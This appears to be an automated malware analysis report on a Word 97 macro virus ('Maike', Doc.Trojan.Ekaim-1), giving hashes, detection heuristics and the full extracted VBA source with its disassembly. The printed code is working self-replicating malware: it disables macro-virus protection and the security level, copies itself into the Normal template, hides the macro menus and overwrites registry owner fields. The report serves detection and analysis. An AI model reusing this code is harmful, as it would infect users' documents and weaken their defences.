Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab5dca3099c70e71…

MALICIOUS

Office (OLE)

31.0 KB Created: 2003-03-02 08:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9a19acba5da0f671f4cb6f4be2b98066 SHA-1: 0a6486cd6ed4235a862f09c943f2e66abf669667 SHA-256: ab5dca3099c70e7179b4000848ab1e48295b0b03c6190423124ea7b3e5c2f04f
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, indicating a malicious document. The script attempts to export its own macro code to a system directory and import it into the Normal template or active document, suggesting an attempt to establish persistence or facilitate further execution. The ClamAV detection as 'Doc.Trojan.Ekaim-1' further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.Ekaim-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ekaim-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8768 bytes
SHA-256: 21ca5081349eef28de5585db357ba5db105434e9b0ab6affb495dce0200739d5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Maike"
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Dim sSysdir As String

Sub Maike()
On Error Resume Next

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 0&

Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros = 0

Options.VirusProtection = False
Options.SaveNormalPrompt = False
 
 sSysdir = Space$(256)
 GetSystemDirectory sSysdir, Len(sSysdir)
 sSysdir = Left$(sSysdir, InStr(sSysdir, Chr$(0)) - 1)
 sSysdir = sSysdir + "\Maike.sys"

Application.VBE.ActiveVBProject.VBComponents("Maike").Export sSysdir

For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "Maike" Then NormInstall = True
Next I

For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Maike" Then ActivInstall = True
Next I

If ActivInstall = True And NormInstall = False Then Set MIMI = NormalTemplate.VBProject _
Else If ActivInstall = False And NormInstall = True Then Set MIMI = ActiveDocument.VBProject
MIMI.VBComponents.Import (sSysdir)

If Day(Now()) = 1 Or Day(Now()) = 14 Or Day(Now()) = 28 Then Love

' This stupid Macro is coded from Vampir and many grezz to my friends and Maike the little good looking girl
'               VIRIINAME: MAIKE
End Sub

Sub Love()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Maike you are": System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "the most beautiful": System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "ProductId") = "girl in the world"
End Sub

Sub suppe()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub


Sub FileSave()
    On Error Resume Next
    Call Maike
    ActiveDocument.Save
End Sub
Sub FileSaveAs()
    On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
    Call Maike
End Sub

Sub AutoOpen()
    On Error Resume Next
    Call Maike
    Call suppe
End Sub

Sub AutoClose()
    On Error Resume Next
    Call Maike
End Sub

Sub ToolsMacro()
    On Error Resume Next
End Sub
Sub FileTemplates()
    On Error Resume Next
End Sub
Sub ViewVBCode()
    On Error Resume Next
End Sub


' Processing file: /tmp/qstore_4_4eyeal
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Maike - 5257 bytes
' Line #0:
' 	FuncDefn (Private Declare Function GetSystemDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' 	Dim 
' 	VarDefn sSysdir (As String)
' Line #2:
' Line #3:
' 	FuncDefn (Sub Maike())
' Line #4:
' 	OnError (Resume Next) 
' Line #5:
' Line #6:
' 	LitDI4 0x0000 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #7:
' Line #8:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #9:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	MemSt DisableAutoMacros 
' Line #10:
' Line #11:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #12:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #13:
' Line #14:
' 	LitDI2 0x0100 
' 	ArgsLd Space$ 0x0001 
' 	St sSysdir 
' Line #15:
' 	Ld sSysdir 
' 	Ld sSysdir 
' 	FnLen 
' 	ArgsCall GetSystemDirectory 0x0002 
' Line #16:
' 	Ld sSysdir 
' 	Ld sSysdir 
' 	LitDI2 0x0000 
' 	ArgsLd Chr$ 0x0001 
' 	FnInStr 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd LBound$ 0x0002 
' 	St sSysdir 
' Line #17:
' 	Ld sSysdir 
' 	LitStr 0x000A "\Maike.sys"
' 	Add 
' 	St sSysdir 
' Line #18:
' Line #19:
' 	Ld sSysdir 
' 	LitStr 0x0005 "Maike"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #20:
' Line #21:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #22:
' 	Ld I 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "Maike"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NormInstall 
' 	EndIf 
' Line #23:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #24:
' Line #25:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #26:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "Maike"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St ActivInstall 
' 	EndIf 
' Line #27:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #28:
' Line #29:
' 	LineCont 0x0004 0F 00 00 00
' 	Ld ActivInstall 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld NormInstall 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	Set MIMI 
' 	Else 
' 	BoSImplicit 
' 	Ld ActivInstall 
' 	LitVarSpecial (False)
' 	Eq 
' 	Ld NormInstall 
' 	LitVarSpecial (True)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	Set MIMI 
' 	EndIf 
' 	EndIf 
' Line #30:
' 	Ld sSysdir 
' 	Paren 
' 	Ld MIMI 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #31:
' Line #32:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0001 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000E 
' 	Eq 
' 	Or 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x001C 
' 	Eq 
' 	Or 
' 	If 
' 	BoSImplicit 
' 	ArgsCall Love 0x0000 
' 	EndIf 
' Line #33:
' Line #34:
' 	QuoteRem 0x0000 0x006B " This stupid Macro is coded from Vampir and many grezz to my friends and Maike the little good looking girl"
' Line #35:
' 	QuoteRem 0x0000 0x001F "               VIRIINAME: MAIKE"
' Line #36:
' 	EndSub 
' Line #37:
' Line #38:
' 	FuncDefn (Sub Love())
' Line #39:
' 	LitStr 0x000D "Maike you are"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x000F "RegisteredOwner"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' 	BoS 0x0000 
' 	LitStr 0x0012 "the most beautiful"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0016 "RegisteredOrganization"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' 	BoS 0x0000 
' 	LitStr 0x0011 "girl in the world"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0009 "ProductId"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #40:
' 	EndSub 
' Line #41:
' Line #42:
' 	FuncDefn (Sub suppe())
' Line #43:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed FileName 
' 	Ld wdFormatDocument 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' Line #44:
' 	EndSub 
' Line #45:
' Line #46:
' Line #47:
' 	FuncDefn (Sub FileSave())
' Line #48:
' 	OnError (Resume Next) 
' Line #49:
' 	ArgsCall (Call) Maike 0x0000 
' Line #50:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #51:
' 	EndSub 
' Line #52:
' 	FuncDefn (Sub FileSaveAs())
' Line #53:
' 	OnError (Resume Next) 
' Line #54:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #55:
' 	ArgsCall (Call) Maike 0x0000 
' Line #56:
' 	EndSub 
' Line #57:
' Line #58:
' 	FuncDefn (Sub AutoOpen())
' Line #59:
' 	OnError (Resume Next) 
' Line #60:
' 	ArgsCall (Call) Maike 0x0000 
' Line #61:
' 	ArgsCall (Call) suppe 0x0000 
' Line #62:
' 	EndSub 
' Line #63:
' Line #64:
' 	FuncDefn (Sub AutoClose())
' Line #65:
' 	OnError (Resume Next) 
' Line #66:
' 	ArgsCall (Call) Maike 0x0000 
' Line #67:
' 	EndSub 
' Line #68:
' Line #69:
' 	FuncDefn (Sub ToolsMacro())
' Line #70:
' 	OnError (Resume Next) 
' Line #71:
' 	EndSub 
' Line #72:
' 	FuncDefn (Sub FileTemplates())
' Line #73:
' 	OnError (Resume Next) 
' Line #74:
' 	EndSub 
' Line #75:
' 	FuncDefn (Sub ViewVBCode())
' Line #76:
' 	OnError (Resume Next) 
' Line #77:
' 	EndSub 
' Line #78: